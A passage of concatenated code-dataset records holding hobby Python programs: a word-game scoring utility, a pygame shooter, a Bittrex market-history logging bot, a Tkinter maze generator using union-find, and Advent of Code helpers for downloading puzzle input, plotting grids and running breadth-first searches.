\n\n The score for a word is the product of two components:\n\n The first component is the sum of the points for letters in the word.\n The second component is the larger of:\n 1, or\n 7*wordlen - 3*(n-wordlen), where wordlen is the length of the word\n and n is the hand length when the word was played\n\n Letters are scored as in Scrabble; A is worth 1, B is\n worth 3, C is worth 3, D is worth 2, E is worth 1, and so on.\n\n word: string\n n: int >= 0\n returns: int >= 0\n \"\"\"\n\n sum_letter_score = 0\n for letter in word.lower():\n sum_letter_score += letter_score(letter)\n\n wordlen = len(word)\n num_word = 7*wordlen - 3*(n-wordlen)\n if 1 > num_word:\n larger = 1\n else:\n larger = num_word\n\n return sum_letter_score * larger\n\n#\n# Make sure you understand how this function works and what it does!\n#\n\n\ndef wildcard_to_regex(word: str) -> re:\n return re.compile(\"^\" + word.replace(\"*\", \".\") + \"$\")\n\n#\n# Problem #3: Test word validity\n#\n\n\ndef is_valid_word(word, hand, word_list):\n \"\"\"\n Returns True if word is in the word_list and is entirely\n composed of letters in the hand. Otherwise, returns False.\n Does not mutate hand or word_list.\n\n word: string\n hand: dictionary (string -> int)\n word_list: list of lowercase strings\n returns: boolean\n \"\"\"\n word_lower = word.lower()\n regex = wildcard_to_regex(word_lower)\n num_matches = len(list(filter(regex.match, word_list)))\n if num_matches == 0:\n return False\n\n word_freq_dict = get_frequency_dict(word_lower)\n for key in word_freq_dict.keys():\n if key not in hand.keys():\n return False\n for pair in word_freq_dict.items():\n # If letter appears more times in word than in hand\n if pair[1] > hand[pair[0]]:\n return False\n return True\n\n#\n# Problem #5: Playing a hand\n#\n\n\ndef calculate_handlen(hand):\n \"\"\" \n Returns the length (number of letters) in the current hand.\n\n hand: dictionary (string-> int)\n returns: integer\n \"\"\"\n\n sum = 0\n for value in hand.values():\n sum += value\n return sum\n\n\ndef get_input(message: str):\n return input(message).strip().lower()\n# -----------------------------------\n# Helper code\n# (you don't need to understand this helper code)\n\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. 
Words are strings of lowercase letters.\n\n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n\n print(\"Loading word list from file...\")\n # wordlist: list of strings\n wordlist = []\n with open(WORDLIST_FILENAME, 'r') as inFile:\n for line in inFile:\n wordlist.append(line.strip().lower())\n\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\n\ndef get_frequency_dict(sequence):\n \"\"\"\n Returns a dictionary where the keys are elements of the sequence\n and the values are integer counts, for the number of times that\n an element is repeated in the sequence.\n\n sequence: string or list\n return: dictionary\n \"\"\"\n\n # freqs: dictionary (element_type -> int)\n freq = {}\n for x in sequence:\n freq[x] = freq.get(x, 0) + 1\n return freq\n\n\n# (end of helper code)\n# -----------------------------------\n","sub_path":"gameutil.py","file_name":"gameutil.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"122313155","text":"\n\nfrom random import randint\n\nimport pygame\nfrom pygame.locals import *\n\nfrom spritesheet import SpriteSheet\n\n\npygame.init()\nscreen = pygame.display.set_mode((500, 600))\n\nsprite_sheet = SpriteSheet('assets/shooter_sheet.sheet')\nstar_surface = sprite_sheet.new_surface('star_y_1')\nship_surface = sprite_sheet.new_surface('ship')\n\nclass Star(pygame.sprite.Sprite):\n def __init__(self, surface, speed, start_x):\n pygame.sprite.Sprite.__init__(self)\n self.image = surface\n self.rect = self.image.get_rect()\n self.last_time = pygame.time.get_ticks()\n self.y = 0\n self.rect.x = start_x\n self.speed = speed\n \n def update(self):\n if self.rect.y >= 600:\n self.kill()\n return\n current_time = pygame.time.get_ticks()\n delta_time = current_time - self.last_time\n self.y += ((self.speed) * delta_time) * 0.001\n self.rect.y = self.y\n self.last_time = current_time\n\nclass Ship(pygame.sprite.Sprite):\n def __init__(self, surface, start_x, start_y):\n pygame.sprite.Sprite.__init__(self)\n self.image = surface\n self.rect = self.image.get_rect()\n self.rect.x = start_x\n self.rect.y = start_y\n self.last_time = pygame.time.get_ticks()\n self.h_velocity = 0\n self.x = start_x\n\n def update(self):\n current_time = pygame.time.get_ticks()\n delta_time = current_time - self.last_time\n self.x += ((self.h_velocity) * delta_time) * 0.335\n self.rect.x = self.x\n self.last_time = current_time\n \nbackground_group = pygame.sprite.RenderUpdates()\nship_group = pygame.sprite.RenderUpdates()\n\nship = Ship(ship_surface, screen.get_width()/2, screen.get_height()-40)\nship_group.add(ship)\n\ngame_running = True\nwhile game_running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n game_running = False\n if event.key == K_LEFT:\n ship.h_velocity += -1\n if event.key == K_RIGHT:\n ship.h_velocity += 1\n if event.type == KEYUP:\n if event.key == K_LEFT:\n ship.h_velocity -= -1\n if event.key == K_RIGHT:\n ship.h_velocity -= 1\n \n if randint(0,100) == 1:\n star_speed = randint(300,400)\n star_y_location = randint(0,screen.get_width())\n new_star = Star(star_surface, star_speed, star_y_location)\n background_group.add(new_star)\n \n screen.fill((0,0,0))\n background_group.update()\n ship_group.update()\n \n updated_rects = []\n updated_rects += background_group.draw(screen)\n updated_rects += ship_group.draw(screen)\n 
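# Dirty-rect note (added): each RenderUpdates.draw() call above returns the\n    # Rects it changed, so passing them to display.update() repaints only those\n    # regions rather than flipping the whole 500x600 surface every frame.\n    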
pygame.display.update(updated_rects)\n\n\n","sub_path":"08_add_the_ship.py","file_name":"08_add_the_ship.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"186070504","text":"import csv\nimport datetime as datetime\nimport json\nimport time\nfrom datetime import datetime\nfrom getpass import _raw_input\n\nfrom bittrex import Bittrex\nfrom _thread import start_new_thread, allocate_lock\n\n#classes\nclass Hist_element:\n def __init__(self, id, amount, price, ts):\n self.id = id\n self.amount = amount\n self.price = price\n self.ts = ts\n\n def __eq__(self, other):\n return self.id == other.id\n\n def __str__(self):\n return str(self.__dict__)\n\nclass Out_element1:\n def __init__(self,minutes, price, trans_amount, coin_amount, change_sm, change_md, change_lg, t0_price):\n self.minutes = minutes\n self.price = \"{:.16f}\".format(float(price))\n self.trans_amount = \"{:.16f}\".format(float(trans_amount))\n self.coin_amount = \"{:.16f}\".format(float(coin_amount))\n self.change_sm = \"{:.16f}\".format(float(change_sm))\n self.change_md = \"{:.16f}\".format(float(change_md))\n self.change_lg = \"{:.16f}\".format(float(change_lg))\n self.t0_price = \"{:.16f}\".format(float(t0_price))\n\n def getIterable(self):\n return [self.minutes, self.price, self.trans_amount, self.coin_amount, self.change_sm, self.change_md, self.change_lg, self.t0_price]\n\n#settings\nCHANGE_SM = 5*60 #seconds\nCHANGE_MD = 15*60 #seconds\nCHANGE_LG = 30*60 #seconds\nHISTORY = 60*60 #size of history store in seconds\nOFFSET = 30*60 #time for future prediction\n#vars + init\nmy_bitterx = Bittrex(None, None)\nmarkets = []\nbit_markets = my_bitterx.get_markets()[\"result\"]\nfor market in bit_markets:\n markets.append(market[\"BaseCurrency\"]+\"-\"+market[\"MarketCurrency\"])\nprint(markets)\nhistory_store = [] #storage for history\n#markets = json.load(open(\"markets.json\",'r'))\nfor market in markets:\n history_store.append({ \"flag\": False, \"market\": market, \"history\":[]})\nlock = allocate_lock()\n\n#extract markethistory\ndef hist_fetch(a):\n global my_bitterx, history_store, markets\n print(\"Thread 1 started\")\n while True:\n for store in history_store:\n if store[\"market\"] == a:\n akt_hist = Bittrex.get_market_history(my_bitterx,a,200)[\"result\"] #get history for every market\n if akt_hist:\n akt_hist.reverse()\n for element in akt_hist:\n try:\n element = Hist_element(element['Id'],element['Quantity'],element['Price'],datetime.strptime(element['TimeStamp'],'%Y-%m-%dT%H:%M:%S.%f')) #get required fields\n #print(element)\n except ValueError:\n element = Hist_element(element['Id'],element['Quantity'],element['Price'],datetime.strptime(element['TimeStamp'],'%Y-%m-%dT%H:%M:%S')) #get required fields\n lock.acquire()\n if element not in store[\"history\"]:\n store[\"history\"].append(element)\n #print(store[\"market\"] + \" added: \"+str(element))\n lock.release()\n lock.acquire()\n while (datetime.utcnow().timestamp() - store[\"history\"][0].ts.timestamp()) > HISTORY:\n #print(str(history_store[i][0]))\n #print((history_store[i][0].ts.timestamp()-datetime.utcnow().timestamp())/60)\n store[\"flag\"] = True\n store[\"history\"].pop(0)\n if len(store[\"history\"]) == 0:\n break\n print(store[\"market\"]+\": \"+str(len(store[\"history\"])))\n #print((datetime.utcnow().timestamp()-history_store[i][len(history_store[i])-1].ts.timestamp())/60)\n #print((datetime.utcnow().timestamp()-history_store[i][0].ts.timestamp())/60)\n 
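# The trim above runs under the lock so brain_result never observes a\n                # half-pruned history list; release it before sleeping.\n                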
lock.release()\n            time.sleep(20)\n\ndef brain_result(b):\n    global history_store\n    print(\"Thread 2 started\")\n    for element in history_store:\n        element[\"flag\"] = False\n    while True:\n        print(\"I am working\")\n        for store in history_store:\n            if store[\"flag\"]: #true once the stored history spans the full HISTORY window\n                print(\"About to write output: \"+store[\"market\"])\n                coin_count, transactions, changesm, changemd, changelg = 0, 0, 0, 0, 0\n                akt_value = my_bitterx.get_ticker(store[\"market\"])['result']['Last']\n                offset_value = 0\n                for element in store[\"history\"]:\n                    if (datetime.utcnow().timestamp() - element.ts.timestamp()) < OFFSET:\n                        offset_value = element.price\n                akt_time = datetime.utcnow().hour * 60 + datetime.utcnow().minute\n                changelg = offset_value - store[\"history\"][0].price\n                lock.acquire()\n                for counter, element in enumerate(store[\"history\"]):\n                    time_diff = datetime.utcnow().timestamp() - element.ts.timestamp()\n                    if time_diff < (CHANGE_SM + OFFSET) and time_diff > OFFSET:\n                        if changesm == 0:\n                            changesm = (offset_value - element.price) / element.price\n                        transactions += 1\n                        coin_count += element.amount\n                    else:\n                        if time_diff < (CHANGE_MD + OFFSET) and time_diff > OFFSET and changemd == 0:\n                            changemd = (offset_value - element.price) / element.price\n                lock.release()\n                out = Out_element1(akt_time, offset_value, transactions, coin_count, changesm, changemd, changelg, akt_value)\n                with open(\"brain_out.csv\", \"a\") as brain_out:\n                    csv_writer = csv.writer(brain_out, delimiter=';', lineterminator='\\n', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n                    csv_writer.writerow(out.getIterable())\n                #print(\"New Output\")\n        time.sleep(5*60)\n\n\nfor market in markets:\n    start_new_thread(hist_fetch,(market,))\ntime.sleep(60*60)\nstart_new_thread(brain_result,(2,))\nc = _raw_input(\"Press Enter to exit.\")\n","sub_path":"Brain_In_Gen/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"499225616","text":"\n\n\nfrom Tkinter import *\nfrom math import *\nfrom numpy import *\nfrom tkMessageBox import *\n\nclass UnionFind:\n    #This is the classic Union find class that we went over in class\n    def __init__(self, dimension):\n        dimension = int(dimension)\n        self.N = dimension*dimension\n        self.nodes = [0] * self.N\n        self.sz = [1] * self.N\n\n        for i in range(0, self.N):\n            self.nodes[i] = i\n\n    def find(self, i):\n        while i != self.nodes[i]:\n            self.nodes[i] = self.nodes[self.nodes[i]]\n            i = self.nodes[i]\n        return i\n\n\n    def connected(self, p, q):\n        return self.find(p) == self.find(q)\n\n    def union(self, p, q):\n        i = self.find(p)\n        j = self.find(q)\n        if self.sz[i] < self.sz[j]:\n            self.nodes[i] = j\n            self.sz[j] += self.sz[i]\n        else:\n            self.nodes[j] = i\n            self.sz[i] += self.sz[j]\n\n\nclass Maze:\n    def __init__(self, dimension, win):\n        dimension = int(dimension)\n        self.window = win\n        self.total_y = 0\n        self.total_x = 0\n        self.walls = []\n        self.current_walls = []\n        self.locale = [0, 0]\n        self.locale_list = [0, 0]\n        self.counter = 0\n        self.dimension = dimension\n        o_w = dimension*20+20\n        #outer wall\n        #the list below starts with the four outer boundary walls; the dot's segments are appended in generate_maze\n        self.coordinates = [[20, 20, 20, o_w], [20, o_w, o_w-20, o_w], [o_w, o_w, o_w, \\\n                            20], [o_w, 20, 40, 20]]\n\n        self.generate_maze(dimension)\n    \n    def generate_maze(self, dimension):\n        self.walls = []\n        self.wall_check = []\n        checker = 0\n        skip_line = 1\n        tally = 1\n        #this section of code runs through a for loop to create a list of \"walls\" in my program
\n        #(0, 1), (0, 5), (1, 2) etc.\n        for i in range(0, dimension*dimension):\n            if checker == i:\n                value = tally*dimension-1\n                checker = value\n                if skip_line == 1:\n                    skip_line = 0\n                else:\n                    skip_line = 1\n                tally += 1\n            if skip_line == 0:\n                self.walls.append([i, i+1])\n            if i < (dimension*dimension-dimension):\n                self.walls.append([i, i+dimension])\n        skip_line = 0\n        self.current_walls = self.walls\n        \n        random.seed()\n        while len(self.current_walls) != 0:\n            num = random.randint(0, len(self.current_walls))\n            i = self.current_walls[num][0]\n            j = self.current_walls[num][1]\n            #this section of code takes a random number and grabs a wall from my list\n            #self.current_walls above is the list that this section of code will cycle through in order\n            #to make sure that each of the sections are either connected components or have a wall deleted\n            self.current_walls.remove(self.current_walls[num])\n            if not UF.connected(i, j):\n                UF.union(i, j)\n                self.wall_check = self.wall_check + [[i, j]]\n            else:\n                tally = 0\n                orig_i = i\n                orig_j = j\n                #if the section is already connected and I want to draw a line in Tkinter I figure out\n                #what section of the theoretical grid that wall should be in by reducing it to its\n                #lowest value 0 through N (dimensions of maze). That's what the below section does\n                while i >= dimension or j >= dimension:\n                    if i >= dimension:\n                        i = i-dimension\n                    if j >= dimension:\n                        j = j-dimension\n                    tally += 1\n                if orig_j-orig_i != 1:\n                    #this section adds coordinates of the walls based on the position of the wall that was\n                    #found in the above code\n                    #i and j are those reduced values and tally just keeps track of how many times it was reduced\n                    #which nicely turns out to be the position of the wall on the y axis\n                    self.coordinates = self.coordinates + [[20+i*20,\\\n                        20+tally*20, 20+(i+1)*20, 20+tally*20]]\n                else:\n                    self.coordinates = self.coordinates + [[20+j*20, \\\n                        20+tally*20, 20+j*20, 20+(tally+1)*20]]\n        self.coordinates = self.coordinates + [[28, 28, 28, 32], [29, 28, 29, 32], \\\n            [30, 28, 30, 32], [31, 28, 31, 32], [32, 28, 32, 32]]\n        self.draw_ball(0, 0)\n\n\n    def draw_maze(self, list_points):\n        self.window.delete(\"all\")\n        for i in range(0, len(list_points)):\n            #pretty straightforward section.
I draw the lines here based on the coordinates list\n #the i<4 section is just to make the outside lines a different color\n if i < 4:\n self.window.create_line(list_points[i][0], list_points[i][1], \\\n list_points[i][2], list_points[i][3], fill=\"red\")\n else:\n self.window.create_line(list_points[i][0], list_points[i][1], \\\n list_points[i][2], list_points[i][3], fill=\"blue\") \n\n\n\n def draw_ball(self, shift_y, shift_x):\n self.total_y = self.total_y + shift_y\n self.total_x = self.total_x + shift_x\n ty = self.total_y\n tx = self.total_x\n\n #I use these values to keep track of where the dot should be\n #these make the move_ball function easy to implement, by just changing the x or y\n #coordinates by a certain value, essentially a translation\n\n self.coordinates = self.coordinates + \\\n [[28+tx, 28+ty, 28+tx, 32+ty], [29+tx, 28+ty, 29+tx, 32+ty], \\\n [30+tx, 28+ty, 30+tx, 32+ty], [31+tx, 28+ty, 31+tx, 32+ty], \\\n [32+tx, 28+ty, 32+tx, 32+ty]]\n\n self.draw_maze(self.coordinates)\n\n\n def move_ball(self, event):\n #locale value coordinates the location of the dot with the list of walls so\n #that the dot doesn't go through walls it shouldn't\n #in these functions is also the code that erases the dot if the dot retraces its steps\n #this code also allows for a cheat where you leave the maze through the top of the initial\n #position, that coding is the self.counter part of the puzzle. self.counter will always be\n #0, unless you press i (and move up) from position 0,0. If you move up from 0,0, you will\n #be able to move the dot freely around the map. If you move the dot in a specific way you\n #can still win! but you will have cheated. (this specific implementation only works for a\n #20x20 size map)\n if event.char == 'l':\n self.locale[1] = self.locale[1] + 1\n if self.counter == 0:\n if self.locale in self.wall_check:\n self.locale[0] = self.locale[0] + 1\n locale = [[self.locale[0], self.locale[1]]]\n locale_check = [self.locale[0], self.locale[1]]\n if locale_check not in self.locale_list:\n self.locale_list = self.locale_list + locale\n else:\n for i in range (0, 10):\n self.coordinates.remove(self.coordinates[len(self.coordinates)-1])\n self.locale_list.remove(self.locale_list[len(self.locale_list)-1])\n self.draw_ball(0, 20)\n else:\n self.locale[1] = self.locale[1] - 1\n else:\n self.draw_ball(0, 20)\n if self.locale == [self.dimension**2-1, self.dimension**2-1]:\n showinfo('Ok', 'You Win!! Well done!')\n\n\n\n if event.char == 'k':\n self.locale[1] = self.locale[1] + self.dimension\n if self.counter == 0:\n if self.locale in self.wall_check:\n self.locale[0] = self.locale[0] + self.dimension\n locale = [[self.locale[0], self.locale[1]]]\n locale_check = [self.locale[0], self.locale[1]]\n if locale_check not in self.locale_list:\n self.locale_list = self.locale_list + locale\n else:\n for i in range (0, 10):\n self.coordinates.remove(self.coordinates[len(self.coordinates)-1])\n self.locale_list.remove(self.locale_list[len(self.locale_list)-1])\n self.draw_ball(20, 0)\n else:\n self.locale[1] = self.locale[1] - self.dimension\n else:\n self.draw_ball(20, 0)\n if self.locale == [self.dimension**2-1, self.dimension**2-1]:\n showinfo('Ok', 'You Win!! 
Well done!')\n\n\n\n if event.char == 'i':\n if self.locale[0] == 0 and self.locale[1] == 0:\n self.counter = 1\n self.locale[0] = self.locale[0] - self.dimension\n if self.counter == 0:\n if self.locale in self.wall_check:\n self.locale[1] = self.locale[1] - self.dimension\n locale = [[self.locale[0], self.locale[1]]]\n locale_check = [self.locale[0], self.locale[1]]\n if locale_check not in self.locale_list:\n self.locale_list = self.locale_list + locale\n else:\n for i in range (0, 10):\n self.coordinates.remove(self.coordinates[len(self.coordinates)-1])\n self.locale_list.remove(self.locale_list[len(self.locale_list)-1])\n\n self.draw_ball(-20, 0)\n else:\n self.locale[0] = self.locale[0] + self.dimension\n else:\n self.draw_ball(-20, 0)\n if self.locale == [-41, 440]:\n showinfo('Ok', 'You Win!! But you cheated... Naughty naughty.')\n\n\n\n if event.char == 'j':\n self.locale[0] = self.locale[0] - 1\n if self.counter == 0:\n if self.locale in self.wall_check:\n self.locale[1] = self.locale[1] - 1\n locale = [[self.locale[0], self.locale[1]]]\n locale_check = [self.locale[0], self.locale[1]]\n if locale_check not in self.locale_list:\n self.locale_list = self.locale_list + locale\n else:\n for i in range (0, 10):\n self.coordinates.remove(self.coordinates[len(self.coordinates)-1])\n self.locale_list.remove(self.locale_list[len(self.locale_list)-1])\n self.draw_ball(0, -20)\n else:\n self.locale[0] = self.locale[0] + 1\n else:\n self.draw_ball(0, -20)\n\n\n\n \n\n\n\n\n\nif __name__ == \"__main__\":\n # create a Tkinter \n window = Canvas(Tk(), width=700, height=700)\n window.pack()\n\n # create a 2D object\n n = 30\n UF = UnionFind(n)\n my_maze = Maze(n, window)\n #can also have sys.argv or raw_input() to allow the user to choose the file\n #box.txt is simply the file that I created for this program to use, any\n #other similarly ordered text file would also work, such as rectangle\n\n # define function that captures keyboard events\n window.bind_all(\"\", my_maze.move_ball)\n\n # start the event handler\n mainloop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Simple Maze with Random Generation/Maze_orig.py","file_name":"Maze_orig.py","file_ext":"py","file_size_in_byte":14502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"530367926","text":"\"\"\"Tools to help solve advent of code problems faster\"\"\"\nimport abc\nimport collections\nimport contextlib\nimport copy\nimport datetime\nimport hashlib\nimport itertools\nimport os\nimport shutil\nimport urllib.request\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef set_up_directory(day):\n \"\"\"Make a new directory for working on an advent of code problem\n\n Args:\n day: int\n day of the month to work on\n\n Returns:\n new_dir: str\n path to the directory for that day\n \"\"\"\n this_dir = os.path.dirname(__file__)\n new_dir = os.path.join(this_dir, 'day' + str(day))\n with contextlib.suppress(FileExistsError):\n os.mkdir(new_dir)\n new_file_name = os.path.join(new_dir, 'day' + str(day) + '.py')\n template_file_name = os.path.join(this_dir, 'template.py')\n if not(os.path.exists(new_file_name)):\n shutil.copy(template_file_name, new_file_name)\n return new_dir\n\n\ndef download_input_data(day, new_dir):\n \"\"\"Download input data for an advent of code problem\n\n Args:\n day: int\n day of the month to work on\n new_dir: str\n path to the directory for that day\n\n Returns:\n None\n \"\"\"\n with open('session_cookie.txt') as cookie_file:\n 
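# adventofcode.com serves puzzle input per user, so the request built\n        # below has to carry the logged-in session cookie read here.\n        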
session_cookie = cookie_file.read()\n url = f'https://adventofcode.com/2016/day/{day}/input'\n opener = urllib.request.build_opener()\n opener.addheaders = [('cookie', 'session=' + session_cookie)]\n urllib.request.install_opener(opener)\n input_file = os.path.join(new_dir, 'input.txt')\n urllib.request.urlretrieve(url, input_file)\n\n\ndef start_coding(day):\n \"\"\"Prepare to code an advent of code problem\n\n Args:\n day: int\n day of the month to work on\n\n Returns:\n None\n \"\"\"\n new_dir = set_up_directory(day)\n download_input_data(day, new_dir)\n\n\ndef start_coding_today():\n \"\"\"Prepare to code today's advent of code problem\"\"\"\n day_of_month = datetime.datetime.today().day\n start_coding(day_of_month)\n\n\ndef read_input_lines():\n \"\"\"Open today's input data and return it as a list of lines\n\n Returns:\n [str]\n Lines in 'input.txt'\n \"\"\"\n with open('input.txt') as in_file:\n data = in_file.read().strip().splitlines()\n return data\n\n\ndef read_whole_input():\n \"\"\"Open today's input data and return it as a single string\n\n Returns:\n str\n Contents of 'input.txt'\n \"\"\"\n with open('input.txt') as in_file:\n data = in_file.read().strip()\n return data\n\n\ndef count_times_true(function):\n \"\"\"Count the number of times some function is true for the input lines\n\n Args:\n function: callable\n A function that takes a string and returns a boolean\n\n Returns:\n count: int\n The number of times the function returns True, when evaluated\n over each line of the file 'input.txt'\n \"\"\"\n strings = read_input_lines()\n valid = [function(string) for string in strings]\n return sum(valid)\n\n\nclass PlottingGrid:\n \"\"\"A tool for maintaining and plotting a grid of numbers\n\n Not abstract, since it works on its own, but designed to be inherited\n with some methods added that manipulate self.grid between construction\n and showing\n\n One note, always use self.grid(y, x) to get and set values, with the\n column first and the row second. It's weird, but that's how numpy works\n \"\"\"\n\n def __init__(self, shape):\n \"\"\"Constructor\n\n Args:\n shape: (int, int)\n Number of rows and number of columns in the grid\n \"\"\"\n self.grid = np.zeros(shape)\n\n def read_input_file(self, char_map):\n \"\"\"Read and store the grid from today's input file\n\n Args:\n char_map: {str: int}\n Mapping of characters in the file to integers in the numpy\n array. For example {'.' : 0, '#' : 1} which is typical\n Topaz-notation for a maze with open areas and walls\n Returns:\n\n \"\"\"\n lines = read_input_lines()\n for y_pos, line in enumerate(lines):\n for x_pos, char in enumerate(line):\n self.grid[y_pos, x_pos] = char_map[char]\n\n def show(self):\n \"\"\"Show the grid in a new window\n\n Execution will be suspended until the window is closed\n\n Returns:\n None\n \"\"\"\n plt.clf()\n plt.imshow(self.grid)\n plt.colorbar()\n plt.show()\n\n def draw(self, pause_time=0.01):\n \"\"\"Draw the grid in a new window\n\n Execution will be paused for pause_time but not stopped. Note that\n the screen will close after the pause time. 
It is advised to use\n this method while animating but then to run show() at the end\n\n Args:\n pause_time: float\n Number of seconds to pause after drawing\n\n Returns:\n None\n \"\"\"\n plt.clf()\n plt.imshow(self.grid)\n plt.colorbar()\n plt.draw()\n plt.pause(pause_time)\n\n def sum(self):\n \"\"\"Returns the sum of the values in the grid\n\n Returns:\n sum : int\n Sum of the values stored in this object's grid\n \"\"\"\n return np.sum(self.grid)\n\n def count(self):\n \"\"\"Count of non-zero elements in the grid\n\n Returns:\n count : int\n Count of elements of this object's grid which are non-zero\n \"\"\"\n return np.sum(self.grid != 0)\n\n\nclass StateForGraphs(abc.ABC):\n \"\"\"A starter for a state class for use in graph traversal\n\n One requirement to make this work in number_of_bfs_steps, below, is to\n implement __hash__ and __eq__. What I have found is the simplest way to do\n that is to make a unique string representation of each step, and use\n that to hash and compare the object. That's what's used by default here,\n so that only __str__ must be implemented by the child object. But if\n that doesn't work, just override __hash__ and __eq__ directly.\n\n The second requirement is to implement possible_next_states,\n which provides the edges of the graphs connected to this node, or state.\n That's where the real meat of the problem will end up.\n\n The third requirement is to implement is_final, which tells the BFS\n search when it has reached the destination node.\n\n Notes for optimization of breadth-first searches:\n - If two states are equivalent in some way, as in the steps required\n don't depend on any differences between them, make their string\n representations the same, so that they compare as equal\n - Look for patterns in the best strategies. Don't return paths\n guaranteed to be suboptimal from possible_next_states\n \"\"\"\n\n @abc.abstractmethod\n def __str__(self):\n \"\"\"Return string representation. Used for hashing and comparing equal\n \"\"\"\n pass\n\n def __hash__(self):\n return hash(str(self))\n\n def __eq__(self, other):\n return str(self) == str(other)\n\n @abc.abstractmethod\n def is_final(self):\n \"\"\"Whether this is the final, destination node in the search\n\n Returns:\n is_final_node : bool\n \"\"\"\n return False\n\n @abc.abstractmethod\n def possible_next_states(self):\n \"\"\"Create and return states reachable from this one in one step\n\n This is where the details of the problem go. This should return a\n set of valid states reachable from the current state in one step.\n\n For optimization reasons, it is best to reject steps known to be\n globally suboptimal in this method, by not returning them. The fewer\n states this method returns, the faster the search will go. 
But if\n the globally optimal next state is not contained in the result,\n the search will not find the minimum number of steps.\n\n Returns:\n Set of StateForGraphs\n States reachable from this state in one step\n \"\"\"\n return set(copy.deepcopy(self))\n\n\ndef number_of_bfs_steps(current_state):\n \"\"\"Perform a breadth-first search and return number of steps taken\n\n Args:\n current_state: StateForGraphs\n The state at the beginning of the search; the root of the tree.\n\n Returns:\n The number of steps required to get from current_state to\n a final state, using state.possible_next_states to find states\n reachable in one step from the current state\n\n See Also: StateForGraphs\n to understand the required methods for the states used in the graph.\n The states must implement __hash__, __eq__, possible_next_states,\n and is_final\n \"\"\"\n queue = collections.deque()\n discovered = {current_state: 0}\n queue.append(current_state)\n while queue:\n state = queue.popleft()\n num_steps = discovered[state]\n new_states = state.possible_next_states()\n for new_state in new_states:\n if new_state.is_final():\n return num_steps + 1\n if new_state not in discovered:\n discovered[new_state] = num_steps + 1\n queue.append(new_state)\n\n\ndef number_of_reachable_in_steps(current_state, max_steps):\n \"\"\"Find the number of states reachable from this one in max steps\n\n Use a breadth-first search to figure out how many states are reachable\n from the current state, with a maximum of max_steps steps, when each state\n can provide the states it can reach in one state.\n\n Args:\n current_state: StateForGraphs\n The state at the beginning of the search; the root of the tree.\n max_steps: int\n The maximum number of steps to take, using\n state.possible_next_states to find states reachable in one step\n from the current state\n\n Returns:\n number_reachable : int\n Number of distinct states reachable from current_state,\n with fewer or equal to max_steps steps.\n\n See Also: StateForGraphs\n to understand the required methods for the states used in the graph.\n The states must implement __hash__, __eq__, and possible_next_states\n \"\"\"\n queue = collections.deque()\n discovered = {current_state: 0}\n queue.append(current_state)\n while queue:\n state = queue.popleft()\n num_steps = discovered[state]\n if num_steps < max_steps:\n new_states = state.possible_next_states()\n for new_state in new_states:\n if new_state not in discovered:\n discovered[new_state] = num_steps + 1\n queue.append(new_state)\n return len(discovered)\n\n\ndef longest_path(current_state):\n \"\"\"Find longest possible path from the current state to the final state\n\n Args:\n current_state: StateForGraphs\n The state at the beginning of the search; the root of the tree.\n\n Returns:\n The maximum number of steps that can be used to get from\n current_state to a final state, using state.possible_next_states to\n find states reachable in one step from the current state\n\n See Also: StateForGraphs\n to understand the required methods for the states used in the graph.\n The states must implement __hash__, __eq__, possible_next_states,\n and is_final\n \"\"\"\n queue = collections.deque()\n discovered = {current_state: 0}\n queue.append(current_state)\n lengths = set()\n while queue:\n state = queue.popleft()\n num_steps = discovered[state]\n new_states = state.possible_next_states()\n for new_state in new_states:\n if new_state.is_final():\n lengths.add(num_steps + 1)\n elif new_state not in discovered:\n 
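# Unvisited, non-final state: enqueue it and record how many steps\n                # it took to reach it.\n                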
queue.append(new_state)\n discovered[new_state] = num_steps + 1\n return max(lengths)\n\n\ndef find_final_state(current_state):\n \"\"\"Return the final state found in shortest steps using a BFS search\n\n Args:\n current_state: StateForGraphs\n The state at the beginning of the search; the root of the tree.\n\n Returns:\n final_state: StateForGraphs\n The first state that returns true for its is_final method,\n when using a breadth-first search\n\n See Also: StateForGraphs\n to understand the required methods for the states used in the graph.\n The states must implement __hash__, __eq__, possible_next_states,\n and is_final\n \"\"\"\n queue = collections.deque()\n discovered = {current_state: 0}\n queue.append(current_state)\n while queue:\n state = queue.popleft()\n num_steps = discovered[state]\n new_states = state.possible_next_states()\n for new_state in new_states:\n if new_state.is_final():\n return new_state\n if new_state not in discovered:\n discovered[new_state] = num_steps + 1\n queue.append(new_state)\n\n\nclass Computer(abc.ABC):\n \"\"\"A virtual machine base class for running custom assembly languages\n\n Seems that Topaz likes to put problems that require virtual machines\n with registers that run his own small assembly languages. There was one\n in 2015 (day 23) and one in 2016 (day 12) and a much more complex one\n used on many days in 2019. This probably doesn't implement enough for\n the 2019 IntCode computer but it works for 2015 and 2016.\n\n To use this, inherit from this class. Include the following two lines at\n the start of the class:\n operation = advent_tools.Computer.operation\n return_register = 'a'\n (setting return_register to the register that the question requests) and\n then decorate all assembly commands with @operation('cmd') where cmd is\n the first word of the instruction to call that command. The operations\n can use self.registers to access the computer's registers\n \"\"\"\n\n operation_map = {}\n\n def __init__(self):\n self.registers = collections.defaultdict(int)\n self.instruction_pointer = 0\n\n @property\n @abc.abstractmethod\n def return_register(self):\n \"\"\"The register to return at the end of the program\"\"\"\n pass\n\n @classmethod\n def operation(cls, instruction_first_word):\n \"\"\"Mark a method as an operation\n\n Args:\n instruction_first_word: str\n First word of the instruction, the part that indicates which\n operation to run\n\n Returns:\n A decorator which marks the method as an operation\n \"\"\"\n def decorator(func):\n \"\"\"Decorator to mark a method as an operation\"\"\"\n cls.operation_map[instruction_first_word] = func\n return func\n return decorator\n\n def run_instruction(self, instruction):\n \"\"\"Run a single 